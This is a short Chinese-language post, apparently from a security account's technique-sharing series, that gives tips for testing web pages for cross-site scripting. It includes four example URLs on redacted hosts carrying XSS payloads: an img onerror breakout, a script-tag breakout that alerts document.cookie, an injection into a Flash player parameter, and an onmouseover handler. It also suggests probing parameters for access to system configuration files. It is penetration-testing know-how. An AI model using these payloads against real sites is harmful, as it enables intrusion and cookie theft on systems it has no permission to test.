“攻防技术交流”这一个系列的文章
主要记录日常实战与学习交流的攻防思路与心得体会
如果你有新奇的攻防idea
非常欢迎与小伙伴们一起分享交流
VX群暗号:
后台回复“ 技术交流 ”获取
入群须知:
纯技术交流群禁止灌水
长期潜水不分享交流的会进行清理
希望大家予以理解
在对某些播放器进行测试的时候,可以尝试对参数进行IODR,看看是否能直接引用到系统配置文件,也可以尝试XSS,进行弹窗。
http://xxx.xxx.xxx/xxx/xxx.swf?playerready=alert(document.domain)
在文件下载页面,验证版本号的时候,可以尝试构造XSS payload。
http://xxx.xxx.xxx/xxx/xxxdownload/verify.asp?version=AC12%27%3E%3Cimg%20src=v%20onerror=alert(document.domain)%3E
在视频播放页面,可以尝试对各个参数进行 XSS payload 构造,说不定就有意外惊喜。
http://xxx.xxx.xxx/video.asp?v=Acroxx1%22%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Es_aE&e=mp4&width=560&height=315
在测试博客搜索功能时,对查询参数尝试构造XSS,当鼠标滑倒搜索按钮上时,触发payload造成XSS。
https://xxx.xxx.xxx/blogsearch?q=OnMoUsEoVeR=prompt(/hacked/)//
星光不问赶路人,岁月不负有心人!
加油,网安人!